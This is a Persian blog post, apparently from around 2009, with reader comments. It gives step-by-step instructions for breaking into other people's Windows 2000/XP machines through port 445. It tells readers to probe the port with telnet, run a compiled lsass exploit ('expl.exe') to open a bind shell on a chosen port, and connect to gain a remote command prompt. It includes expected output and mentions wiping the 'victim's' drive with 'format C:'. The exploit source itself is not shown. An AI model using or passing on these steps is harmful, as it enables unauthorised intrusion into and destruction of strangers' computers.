هک با استفاده از پورت 445

میخواهیم به ویندوز 2000 یا ایکس پی حمله کنیم از بیرون دستگاه بدون اینکه به قربانی فایلی بدیم اجرا کنه یا هر ارتباط دیگری با قربانی داشته باشیم یعنی میخوایم خیلی حرفه ای نه مثل این هکر های تازه کار که تروجان میدن به مردم خیلی حرفه ای خودمان میخوایم یک پورت روی دستگاه قربانی باز کنیم بدون اینکه حتی یک کلمه هم با قربانی حرف بزنیم خوب حالا که فهمیدید چیکار میخوام بکنیم من یکبار دیگه هم خلاصه بگم یک ای پی انتخاب میکنید و بعد هکش میکنید اولین کاری که میکنیم این است که ای پی مورد نظر یا همان قربانی را برای باز بودن پورت 445 امتحان میکنیم
Start->run->CMD
را برای باز کردن یک صفحه کامند پرومت بزنید و بعد با دستور
telnet ip 445
امتحان میکنیم که ایا پورت 445 باز است یا نه البته شما اگر حرفه ای هستید حتما مثل هکر های حرفه ای برای این کارها یک برنامه خاص را استفاده میکنی بنا به سلیقه خودتان که از چه برنامه ای خوشتان میاد ولی در اینجا از دستوراتی استفاده میکنیم که هر کسی خواست این کار را انجام بدهد نیاز به برنامه خاصی نداشته باشه و با کمترین امکانات میخوایم به نتیجه برسیم
خوب توجه کنید به جا ای پی در دستور بالا باید ای پی قربانی را وارد کنید و اگر این دستور را وارد کردید و اتصال برقرار شد یعنی پورت 445 باز است پس گام اول را برداشتید و اگر اتصال برقرار نشد و پیغام خطا دریافت کردید قربانی شما به این نوع حمله نفوذ پذیر نیست
خوب حالا به گام دوم میرویم در زیر کد های حمله به این پورت را مشاهده میکنید این کدها را باید کامپایل بفرمائید و فایل اجرایی که بدست می اورید را بصورت زیر استفاده میکنید
 

expl [options]

در خط بالا طرز استفاده به این ترتیب است اولین کلمه expl نام فایل اجرایی است که بعد از کامپایل ایجاد کردید target یک عدد یک رقمی است که مقدار 0 برای ویندوز ایکس پی است و مقدار 1و2 برای ویندوز 2000 است در اخر این نوشته طرز تشخیص اینکه کدام عدد را استفاده کنید یعنی از کجا بفهمید قربانی ویندوز ایکس پی است که 0 بزنید یا قربانی ویندوز 2000 است که 1 یا 2 بزنید را میخوانید
victim ip همان ای پی قربانی شما است که پورت 445 ان باز بود
binport شماره پورتی است که میخواهید روی دستگاه قربانی برای شما باز بشود و به ان پورت وصل بشوید و قربانی را هک کنید
option  یک دستور است که در ادامه تک دستور این برنامه را توضیح میدهم

خوب دوست من کار بسیار ساده است فرض کنید ای پی قربانی من 217.0.0.1 است و من طبق ان چیزهایی که بالا گفتم این کارهای را به تریتب انجام میدهدم


1- Start --> Run --> CMD
2- Telnet 217.0.0.1 445


3- اگر وصل شد از برنامه حمله که قبلا کامپال کردم و الان اماده استفاده است استفاده میکنم
4- پنجره قبلی را که در 2 دستور قبل باز کردم میبندم


5- Start->Run->CMD
6-expl.exe 0 217.0.0.1 24745


----بعد از اینکه دستور خط 6 را زدنید این نوشته ها را مشاهده میکنید----


 * [*] Target: IP: 217.0.0.1: OS: winXP    [universal] lsass.exe
 * [*] Connecting to 217.0.0.1:445 ... OK
 * [*] Attacking ... OK

7-حمله انجام شد و پورت مورد نظر شما که در خط شماره 6 من شماره پورت 24745 را انتخاب کردم  الان باز شده تا ما وارد دستگاه قربانی بشویم


8-Start-->Run-->CMD
9-telnet 217.0.0.1 24745

10-به احتمال 95 درصد شما موفق شدید دستگاه قربانی را هک کنید و این خطوط را مشاهده خواهید کرد
* Microsoft Windows XP [Version 5.00.2600]
 * (C) Copyright 1985-2001 Microsoft Corp.
 *
 * C:WINNTsystem32>


11- دوست من در این جا شما هر دستوری بزنید روی دستگاه قربانی اجرا میشود مثل اگر بزنید format C: می توانید هارد قربانی را فرمت کنید
ولی توجه کنید یک هکر در اوج قدرت دست به خرابکاری نمیزنه !!! پس هر کاری خواستید بکنید ولی خرابکاری نه !!!

و اما چطوری تشخیص بدهید که دستگاه قربانی شما ویندوز 2000 است که از عدد 1 یا 2 استفاده کنید یا ویندوز ایکس پی هست که از عدد0 استفاده کنید ؟ شما کافی است که همان دستور بالا را که برای حمله استفاده مکنید بزنید و فقط به اخرش -t  اضافه کنید یعنی اینطوری


expl 0 217.0.0.1 24745 -t

بعد از زدن این دستور برنامه به شما نسخه ویندوز را اعلام میکند اگر نسخه ویندوز را winnt 5.0اعلام کرد یعنی ویندوز 2000 است و شما عدد 1 یا 2 استفاده کنید و اگر winnt 5.1 را اعلام کرد ویندوز ایکس پی است. http://iran.isgreat.tv

نظرات 14 + ارسال نظر
n3x7d00r دوشنبه 16 شهریور‌ماه سال 1388 ساعت 03:09 ب.ظ

mer30
omidvaram kar kone

مهدی محقق نژاد جمعه 20 شهریور‌ماه سال 1388 ساعت 03:11 ق.ظ http://miladmusic.blogsky.com

می خوام بهتون یه پیشنهاد بدم که آمار بازدید وبلاگ شما بشتر بشه . شما باید برای اینکار من رو با اسم بزرگترین سایت موزیک لینک کنیدوبعد من رو با خبر کنید یعنی این که یا بهم ایمیل بزنید یا به وبلاگم بیاین و اونجا از طریق نظرات من رو خبر دار کنید

به تو چه جمعه 14 اسفند‌ماه سال 1388 ساعت 01:22 ب.ظ http://به توچه

خررحررخرخرخرخرخ

دانیال سه‌شنبه 31 فروردین‌ماه سال 1389 ساعت 06:43 ب.ظ http://www.ssgn.bdl.ir

سلام

منظورتون رو از جمله زیر نفهمیدم :
[EXPL [options

من telnet ip port زدم ولی هر چیزی تایپ می کنم انگار تایپ نمی کنه و فقط ماکن نما جابجا می شه
لطفا راهنمایی کنید

با تشکر

شاهرخ دوشنبه 11 بهمن‌ماه سال 1389 ساعت 10:55 ب.ظ http://WWW.MOSTAFAX.BLOGFA.COM

سلام من تازه میخوام هک یاد بگیرم میشه بهم یاد بدین تو خدا شما میگی کامپایل من منظرتونو ازش نمی فهمم.ممنون میشم ۰۹۳۵۷۱۹۶۵۲۳

ستار سه‌شنبه 1 شهریور‌ماه سال 1390 ساعت 06:43 ب.ظ

کامپایل دیگه چیه کدوم کد هارو کامپایل کنیم

asghar جمعه 21 مهر‌ماه سال 1391 ساعت 03:10 ق.ظ

اگه میشه اون قسمت کامپایل کردنو کامل و جزئ به جزء بگین
ممنون میشم

vahid یکشنبه 5 آذر‌ماه سال 1391 ساعت 04:22 ب.ظ http://mtpars.org

دانیال عزیز ایشون فقط بلدند کپی پست کنند،نمی دونند که چه چیزی رو کپی کرده انددددددددددد

داریوش دوشنبه 23 بهمن‌ماه سال 1391 ساعت 12:02 ب.ظ

داداش اون قسمت کامپایل کردن رو بیشتر توضیح بده نفهمیدم

بیست بیست سه‌شنبه 28 خرداد‌ماه سال 1392 ساعت 08:55 ب.ظ

مرتیکه پوفیوس کوپی پیستم اسونی کامپیاد چیه 3تا سایت رفتم همین یک مطلبه:D

arman safavi چهارشنبه 7 اسفند‌ماه سال 1392 ساعت 03:42 ب.ظ http://www.arman8806.blogfa.com

سلام منظورتون از expl.exe چیه میشه توضیح بدین ممنون.

کاوه یکشنبه 6 اردیبهشت‌ماه سال 1394 ساعت 02:46 ق.ظ

دوستان من بجای ایشون ک فقط کپی پیست کردن و سگ بوق هم حالیش نیست!!من جواب میدم: 1) کامپایل کردن تبدیل کهای برنامه نویسی شده به فایل اجرایی که بسته ب نوع زبان برنامه نویسی باید از کامپایلر مخصوص اون زبان استفاده کنید 2) expl.exe ایعنی اکسپلویتی که از کامپایل کدها بدست اوردیم که البته من اینجا کدی نندیدم ک شما بخواید کامپایل کنید!!!!! 3) در زمان استفاده از شل خود ویندوز در زمان تل نت کردن سیستم دستوراییو ک تایپ کردین نشون نمیده ولی اجرا میکنه شما برای اینکه بتونید دستوراتو ببینید بای از یه برنامه حرفه ای مثل نت کت استفاده کنید که امکانات بیشتریم داره و عصای دست همه هکرای واقعیه..!! امیدوارم تونسته باشم لپه مطلبو برسونم...

sobi.s سه‌شنبه 5 خرداد‌ماه سال 1394 ساعت 12:59 ب.ظ

سلام
من هرچی telnet رو میزنم ازش ایراد میگیره
میگه telnet is not recognized
چیکار باید کنم؟

ugd یکشنبه 14 دی‌ماه سال 1399 ساعت 11:55 ب.ظ

اگه پشت گوشت رو دیدی هک کردن هم دیدی - اینا همش چرنده به فکر کار و زندگیت باش که عمرت حروم شد.

برای نمایش آواتار خود در این وبلاگ در سایت Gravatar.com ثبت نام کنید. (راهنما)
ایمیل شما بعد از ثبت نمایش داده نخواهد شد